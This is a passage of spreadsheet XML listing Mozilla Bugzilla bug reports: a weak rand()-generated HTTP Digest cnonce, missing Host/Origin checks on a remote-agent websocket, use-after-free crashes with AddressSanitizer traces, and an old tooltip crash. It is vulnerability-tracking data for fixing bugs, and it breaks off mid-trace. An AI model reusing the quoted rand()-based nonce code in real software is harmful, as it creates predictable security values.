      <c r="V741" t="n">
        <v>9</v>
      </c>
      <c r="W741" t="inlineStr">
        <is>
          <t>The code for HTTP Digest authentication uses the rand() function to generate a random nonce value (the "cnonce").
This code in nsHttpDigestAuth.cpp:
```
  nsAutoCString cnonce;
  static const char hexChar[] = "0123456789abcdef";
  for (int i = 0; i &lt; 16; ++i) {
    cnonce.Append(hexChar[(int)(15.0 * rand() / (RAND_MAX + 1.0))]);
  }
```
Here: https://searchfox.org/mozilla-central/source/netwerk/protocol/http/nsHttpDigestAuth.cpp#326
This should probably use some secure random function. (Like RNG_GenerateGlobalRandomBytes from NSS.)
I am marking this as a security bug, but I should say that I am unsure what the exact security impact is. I am not familiar with the inner workings of the HTTP Digest authentication protocol and what a predictable cnonce would cause. However, this can probably be used to leak information about the state of the rand() RNG to an attacker. This could be bad if rand() is also used in other problematic places.</t>
        </is>
      </c>
      <c r="X741" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="742">
      <c r="A742" t="n">
        <v>1720098</v>
      </c>
      <c r="B742" t="inlineStr">
        <is>
          <t>2021-07-12 04:38:48 -0700</t>
        </is>
      </c>
      <c r="C742" t="inlineStr">
        <is>
          <t>Need to validate Host and Origin headers for remote agent websockets connection</t>
        </is>
      </c>
      <c r="D742" t="inlineStr">
        <is>
          <t>2022-08-27 00:20:38 -0700</t>
        </is>
      </c>
      <c r="E742" t="n">
        <v>1</v>
      </c>
      <c r="F742" t="n">
        <v>1</v>
      </c>
      <c r="G742" t="n">
        <v>3</v>
      </c>
      <c r="H742" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I742" t="inlineStr">
        <is>
          <t>Remote Protocol</t>
        </is>
      </c>
      <c r="J742" t="inlineStr">
        <is>
          <t>Agent</t>
        </is>
      </c>
      <c r="K742" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L742" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M742" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N742" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O742" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P742" t="inlineStr">
        <is>
          <t>[failures could end up being sec-high][bidi-m2-mvp][post-critsmash-triage][adv-main97+]</t>
        </is>
      </c>
      <c r="Q742" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R742" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S742" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T742" t="n">
        <v>1</v>
      </c>
      <c r="U742" t="n">
        <v>0</v>
      </c>
      <c r="V742" t="n">
        <v>9</v>
      </c>
      <c r="W742" t="inlineStr">
        <is>
          <t>Otherwise it may be posibble for websites to connect to the remote agent c.f. https://bugzilla.mozilla.org/show_bug.cgi?id=1648964. Checxks should go in https://searchfox.org/mozilla-central/source/remote/server/WebSocketHandshake.jsm#76</t>
        </is>
      </c>
      <c r="X742" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="743">
      <c r="A743" t="n">
        <v>1005584</v>
      </c>
      <c r="B743" t="inlineStr">
        <is>
          <t>2014-05-03 20:44:28 -0700</t>
        </is>
      </c>
      <c r="C743" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsTextEditRules::CreateMozBR</t>
        </is>
      </c>
      <c r="D743" t="inlineStr">
        <is>
          <t>2024-05-30 08:34:17 -0700</t>
        </is>
      </c>
      <c r="E743" t="n">
        <v>1</v>
      </c>
      <c r="F743" t="n">
        <v>1</v>
      </c>
      <c r="G743" t="n">
        <v>3</v>
      </c>
      <c r="H743" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I743" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J743" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K743" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L743" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M743" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N743" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O743" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P743" t="inlineStr">
        <is>
          <t>[adv-main30+][adv-esr24.6+][do not open before bug 1018486 is opened]</t>
        </is>
      </c>
      <c r="Q743" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R743" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S743" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T743" t="n">
        <v>1</v>
      </c>
      <c r="U743" t="n">
        <v>0</v>
      </c>
      <c r="V743" t="n">
        <v>49</v>
      </c>
      <c r="W743" t="inlineStr">
        <is>
          <t>Created attachment 8416988
Testcase
Install fuzzPriv extension before running test.html
&gt;==16549==ERROR: AddressSanitizer: heap-use-after-free on address 0x6190009a83a0 at pc 0x7f2757bcb74a bp 0x7fff5c52fb50 sp 0x7fff5c52fb48
&gt;READ of size 8 at 0x6190009a83a0 thread T0
&gt;    #0 0x7f2757bcb749 in nsTextEditRules::CreateMozBR(nsIDOMNode*, int, nsIDOMNode**) editor/libeditor/text/nsTextEditRules.cpp:1347
&gt;    #1 0x7f2757c65f33 in nsHTMLEditRules::InsertMozBRIfNeeded(nsIDOMNode*) editor/libeditor/html/nsHTMLEditRules.cpp:8607
&gt;    #2 0x7f2757c38455 in nsHTMLEditRules::DidDoAction(nsISelection*, nsRulesInfo*, tag_nsresult) editor/libeditor/html/nsHTMLEditRules.cpp:3648
&gt;    #3 0x7f2757c9627c in nsHTMLEditor::InsertBasicBlock(nsAString_internal const&amp;) editor/libeditor/html/nsHTMLEditor.cpp:2165
&gt;    #4 0x7f2757c94b5f in nsHTMLEditor::SetParagraphFormat(nsAString_internal const&amp;) editor/libeditor/html/nsHTMLEditor.cpp:1725
&gt;    #5 0x7f2756434871 in nsParagraphStateCommand::SetState(nsIEditor*, nsString&amp;) editor/composer/src/nsComposerCommands.cpp:654
&gt;    #6 0x7f2756433d8e in nsMultiStateCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) editor/composer/src/nsComposerCommands.cpp:599
&gt;    #7 0x7f2758cebd3f in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) embedding/components/commandhandler/src/nsControllerCommandTable.cpp:171
&gt;    #8 0x7f2758ce20aa in non-virtual thunk to nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) embedding/components/commandhandler/src/nsBaseCommandController.cpp:152
&gt;    #9 0x7f2758ce8026 in nsCommandManager::DoCommand(char const*, nsICommandParams*, nsIDOMWindow*) embedding/components/commandhandler/src/nsCommandManager.cpp:233
&gt;    #10 0x7f275761d2f0 in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) content/html/document/src/nsHTMLDocument.cpp:3242
&gt;    #11 0x7f275574160f in mozilla::dom::HTMLDocumentBinding::execCommand(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitMethodCallArgs const&amp;) objdir-ff-asan/dom/bindings/./HTMLDocumentBinding.cpp:802
&gt;    #12 0x7f27561a4ae7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) dom/bindings/BindingUtils.cpp:2300
&gt;    #13 0x7f275ae8fea0 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:239
&gt;    #14 0x7f275ae83cc8 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2620
&gt;    #15 0x7f275ae67599 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:422
&gt;    #16 0x7f275ae92dcb in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:630
&gt;    #17 0x7f275ae9336e in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/vm/Interpreter.cpp:666
&gt;    #18 0x7f275aae699b in Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::Value*) js/src/jsapi.cpp:4984
&gt;    #19 0x7f275691e0d0 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;, void**) dom/base/nsJSUtils.cpp:254
&gt;    #20 0x7f275691d6ea in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;, void**) dom/base/nsJSUtils.cpp:186
&gt;    #21 0x7f275691ed00 in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, void**) dom/base/nsJSUtils.cpp:306
&gt;    #22 0x7f27567fccb5 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) dom/base/nsGlobalWindow.cpp:11936
&gt;    #23 0x7f27567da69c in nsGlobalWindow::RunTimeout(nsTimeout*) dom/base/nsGlobalWindow.cpp:12166
&gt;    #24 0x7f27567fbd91 in nsGlobalWindow::TimerCallback(nsITimer*, void*) dom/base/nsGlobalWindow.cpp:12412
&gt;    #25 0x7f27539860d4 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:555
&gt;    #26 0x7f275398675e in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:639
&gt;    #27 0x7f275397d7e0 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:715
&gt;    #28 0x7f275383db1a in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #29 0x7f2754165f98 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:136
&gt;    #30 0x7f275410e5f0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:229
&gt;    #31 0x7f27563e0007 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164
&gt;    #32 0x7f275925c5f8 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:278
&gt;    #33 0x7f27590d81a3 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4019
&gt;    #34 0x7f27590d9085 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4088
&gt;    #35 0x7f27590d9edd in XRE_main toolkit/xre/nsAppRunner.cpp:4300
&gt;    #36 0x48c6e7 in main browser/app/nsBrowserApp.cpp:282
&gt;    #37 0x7f27621ae76c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
&gt;    #38 0x48bbbc in _start
&gt;
&gt;0x6190009a83a0 is located 32 bytes inside of 1104-byte region [0x6190009a8380,0x6190009a87d0)
&gt;freed by thread T0 here:
&gt;    #0 0x473b81 in __interceptor_free _asan_rtl_
&gt;    #1 0x7f275388f10a in SnowWhiteKiller::~SnowWhiteKiller() xpcom/base/nsCycleCollector.cpp:2403
&gt;    #2 0x7f275388ed19 in nsCycleCollector::FreeSnowWhite(bool) xpcom/base/nsCycleCollector.cpp:2569
&gt;    #3 0x7f2753894be1 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3445
&gt;    #4 0x7f27538942e6 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3307
&gt;    #5 0x7f2753897ea3 in nsCycleCollector_collect(nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3860
&gt;    #6 0x7f275684c5a6 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) dom/base/nsJSEnvironment.cpp:1940
&gt;    #7 0x7f2756756408 in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) dom/base/nsDOMWindowUtils.cpp:1485
&gt;    #8 0x7f27539909e1 in NS_InvokeByIndex xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
&gt;    #9 0x7f2756580977 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) js/xpconnect/src/XPCWrappedNative.cpp:2399
&gt;    #10 0x7f27565865fe in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1277
&gt;    #11 0x7f275ae8fea0 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:239
&gt;    #12 0x7f275ae83cc8 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2620
&gt;    #13 0x7f275ae67599 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:422
&gt;    #14 0x7f275ae903ee in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:494
&gt;    #15 0x7f275ae9149e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:531
&gt;    #16 0x7f275ac74f24 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:448
&gt;    #17 0x7f275ad7a6f6 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jswrapper.cpp:464
&gt;    #18 0x7f275ac97da5 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:2659
&gt;    #19 0x7f275ac9d2c4 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) js/src/jsproxy.cpp:3062
&gt;    #20 0x7f275ae8fea0 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:239
&gt;    #21 0x7f275ae83cc8 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2620
&gt;    #22 0x7f275ae67599 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:422
&gt;    #23 0x7f275ae903ee in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:494
&gt;    #24 0x7f275ae9149e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:531
&gt;    #25 0x7f275aae9aaf in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:5196
&gt;    #26 0x7f275561872a in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) objdir-ff-asan/dom/bindings/./EventListenerBinding.cpp:43
&gt;    #27 0x7f2756a46c8a in void mozilla::dom::EventListener::HandleEvent&lt;mozilla::dom::EventTarget*&gt;(mozilla::dom::EventTarget* const&amp;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) objdir-ff-asan/dom/events/../../dist/include/mozilla/dom/EventListenerBinding.h:53
&gt;    #28 0x7f2756a464e8 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:946
&gt;    #29 0x7f2756a478a0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1011
&gt;
&gt;previously allocated by thread T0 here:
&gt;    #0 0x473d81 in malloc _asan_rtl_
&gt;    #1 0x7f275e324a4d in moz_xmalloc memory/mozalloc/mozalloc.cpp:52
&gt;    #2 0x7f2757c8907d in nsHTMLEditor::InitRules() objdir-ff-asan/editor/libeditor/html/../../../dist/include/mozilla/mozalloc.h:201
&gt;    #3 0x7f2757bcbf3a in nsAutoEditInitRulesTrigger::~nsAutoEditInitRulesTrigger() editor/libeditor/text/nsPlaintextEditor.cpp:208
&gt;    #4 0x7f2757c86fdc in nsHTMLEditor::Init(nsIDOMDocument*, nsIContent*, nsISelectionController*, unsigned int, nsAString_internal const&amp;) editor/libeditor/html/nsHTMLEditor.cpp:299
&gt;    #5 0x7f275644be09 in nsEditingSession::SetupEditorOnWindow(nsIDOMWindow*) editor/composer/src/nsEditingSession.cpp:450
&gt;    #6 0x7f275644904f in nsEditingSession::MakeWindowEditable(nsIDOMWindow*, char const*, bool, bool, bool) editor/composer/src/nsEditingSession.cpp:168
&gt;    #7 0x7f27576074b9 in nsHTMLDocument::EditingStateChanged() content/html/document/src/nsHTMLDocument.cpp:2734
&gt;    #8 0x7f275761baf5 in nsHTMLDocument::SetDesignMode(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) content/html/document/src/nsHTMLDocument.cpp:2877
&gt;    #9 0x7f275573b791 in mozilla::dom::HTMLDocumentBinding::set_designMode(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitSetterCallArgs) objdir-ff-asan/dom/bindings/./HTMLDocumentBinding.cpp:734
&gt;    #10 0x7f27561a43a5 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) dom/bindings/BindingUtils.cpp:2269
&gt;    #11 0x7f275ae8fea0 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jscntxtinlines.h:239
&gt;    #12 0x7f275ae9149e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:531
&gt;    #13 0x7f275ae9283d in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:603
&gt;    #14 0x7f275ac71cce in js::BaseProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) js/src/jscntxtinlines.h:342
&gt;    #15 0x7f27561a9c8b in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) dom/bindings/DOMJSProxyHandler.cpp:228
&gt;    #16 0x7f275ac96b49 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsproxy.cpp:2572
&gt;    #17 0x7f275ac0fa4e in JSObject::nonNativeSetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, bool) js/src/jsobj.cpp:1668
&gt;    #18 0x7f275ae81125 in Interpret(JSContext*, js::RunState&amp;) js/src/jsobj.h:1022
&gt;    #19 0x7f275ae67599 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:422
&gt;    #20 0x7f275ae903ee in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:494
&gt;    #21 0x7f275ae9149e in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:531
&gt;    #22 0x7f275aae9aaf in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:5196
&gt;    #23 0x7f275561872a in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) objdir-ff-asan/dom/bindings/./EventListenerBinding.cpp:43
&gt;    #24 0x7f2756a46c8a in void mozilla::dom::EventListener::HandleEvent&lt;mozilla::dom::EventTarget*&gt;(mozilla::dom::EventTarget* const&amp;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) objdir-ff-asan/dom/events/../../dist/include/mozilla/dom/EventListenerBinding.h:53
&gt;    #25 0x7f2756a464e8 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) dom/events/EventListenerManager.cpp:946
&gt;    #26 0x7f2756a478a0 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) dom/events/EventListenerManager.cpp:1011
&gt;    #27 0x7f2756a382b1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) dom/events/EventDispatcher.cpp:287
&gt;    #28 0x7f2756a3c3d6 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) dom/events/EventDispatcher.cpp:597
&gt;    #29 0x7f2756a023f5 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) dom/events/EventDispatcher.cpp:661
&gt;
&gt;SUMMARY: AddressSanitizer: heap-use-after-free ??:0 ??
&gt;Shadow bytes around the buggy address:
&gt;  0x0c328012d020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c328012d030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c328012d040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c328012d050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c328012d060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;=&gt;0x0c328012d070: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c328012d080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c328012d090: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c328012d0a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c328012d0b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c328012d0c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:       fa
&gt;  Heap right redzone:      fb
&gt;  Freed heap region:       fd
&gt;  Stack left redzone:      f1
&gt;  Stack mid redzone:       f2
&gt;  Stack right redzone:     f3
&gt;  Stack partial redzone:   f4
&gt;  Stack after return:      f5
&gt;  Stack use after scope:   f8
&gt;  Global redzone:          f9
&gt;  Global init order:       f6
&gt;  Poisoned by user:        f7
&gt;  Contiguous container OOB:fc
&gt;  ASan internal:           fe
&gt;==16549==ABORTING
&gt;
&gt;</t>
        </is>
      </c>
      <c r="X743" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="744">
      <c r="A744" t="n">
        <v>15946</v>
      </c>
      <c r="B744" t="inlineStr">
        <is>
          <t>1999-10-09 12:41:55 -0700</t>
        </is>
      </c>
      <c r="C744" t="inlineStr">
        <is>
          <t>Tooltips crash Mozilla (e.g., the Open Windows in Taskbar)</t>
        </is>
      </c>
      <c r="D744" t="inlineStr">
        <is>
          <t>2000-05-16 17:08:36 -0700</t>
        </is>
      </c>
      <c r="E744" t="n">
        <v>1</v>
      </c>
      <c r="F744" t="n">
        <v>1</v>
      </c>
      <c r="G744" t="n">
        <v>3</v>
      </c>
      <c r="H744" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I744" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J744" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K744" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L744" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M744" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N744" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O744" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P744" t="inlineStr">
        <is>
          <t>cannot verify until tooltips are turned on</t>
        </is>
      </c>
      <c r="Q744" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R744" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S744" t="inlineStr">
        <is>
          <t>M14</t>
        </is>
      </c>
      <c r="T744" t="n">
        <v>1</v>
      </c>
      <c r="U744" t="n">
        <v>0</v>
      </c>
      <c r="V744" t="n">
        <v>30</v>
      </c>
      <c r="W744" t="inlineStr">
        <is>
          <t>I am using Mozilla M10, on a linux system running the Debian 2.2 distribution
and linux kernel 2.2.12. I have a AMD K6-2 processor with 144 megs of ram, and
10.5 gigs of hard drive space.
When I click on the Mozilla or Open Windows buttons in the bottom Task Bar,
Mozilla crashes. There is not a specific error for it, but it just closes.
I am using the binarys of M10 and not my own compiled source.</t>
        </is>
      </c>
      <c r="X744" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="745">
      <c r="A745" t="n">
        <v>1681022</v>
      </c>
      <c r="B745" t="inlineStr">
        <is>
          <t>2020-12-07 00:00:49 -0800</t>
        </is>
      </c>
      <c r="C745" t="inlineStr">
        <is>
          <t>heap-use-after-free on mozilla::StyleGenericCalcNode</t>
        </is>
      </c>
      <c r="D745" t="inlineStr">
        <is>
          <t>2024-05-30 10:24:45 -0700</t>
        </is>
      </c>
      <c r="E745" t="n">
        <v>1</v>
      </c>
      <c r="F745" t="n">
        <v>1</v>
      </c>
      <c r="G745" t="n">
        <v>3</v>
      </c>
      <c r="H745" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I745" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J745" t="inlineStr">
        <is>
          <t>Layout: Flexbox</t>
        </is>
      </c>
      <c r="K745" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L745" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M745" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N745" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O745" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P745" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main84+][sec-survey][adv-esr78.6+]</t>
        </is>
      </c>
      <c r="Q745" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R745" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S745" t="inlineStr">
        <is>
          <t>85 Branch</t>
        </is>
      </c>
      <c r="T745" t="n">
        <v>1</v>
      </c>
      <c r="U745" t="n">
        <v>0</v>
      </c>
      <c r="V745" t="n">
        <v>21</v>
      </c>
      <c r="W745" t="inlineStr">
        <is>
          <t>Created attachment 9191560
testcase.html
Firefox version 85.0a1 (2020-12-06) (64-bit)
Asan output:
```
==29886==ERROR: AddressSanitizer: heap-use-after-free on address 0x6190002ce398 at pc 0x0001154ec20d bp 0x7ffee67aa8d0 sp 0x7ffee67aa8c8
READ of size 1 at 0x6190002ce398 thread T0
==29886==WARNING: failed to spawn external symbolizer (errno: 9)
==29886==WARNING: failed to spawn external symbolizer (errno: 9)
==29886==WARNING: failed to spawn external symbolizer (errno: 9)
==29886==WARNING: failed to spawn external symbolizer (errno: 9)
==29886==WARNING: failed to spawn external symbolizer (errno: 9)
==29886==WARNING: Failed to use and restart external symbolizer!
